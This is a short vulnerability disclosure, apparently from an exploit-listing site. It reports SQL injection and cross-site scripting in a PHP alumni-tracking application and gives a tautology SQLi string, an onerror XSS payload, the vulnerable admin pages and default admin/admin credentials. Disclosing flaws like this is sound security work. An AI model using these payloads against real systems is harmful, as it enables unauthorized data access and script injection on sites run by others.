Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS

2023.03.12
Credit: Eren Arslan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS # Author: @Eawhitehat - Eren Arslan # Demo available : https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html # CVE: N/A # XSS # Screenshot : https://prnt.sc/kYTkGywBEgll & https://prnt.sc/z1XXVFuf58zg Used Payload : SQLi: )%20or%20('x'='x XSS: <image/src/onerror=prompt(8)> Demo Account: Username: admin Password: admin Method : Connect to panel : http://localhost/admin #SQLi 1. After login, go to ../admin/admin_cs.php (BSCS Alumni page) 2. Add the payload in search form for exec the error -> )%20or%20('x'='x #XSS 1. After login, go to ../admin/add_acc.php (Manage account) 2. Click "Add New" and paste the payload in Username/Name -> <image/src/onerror=prompt(8)>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top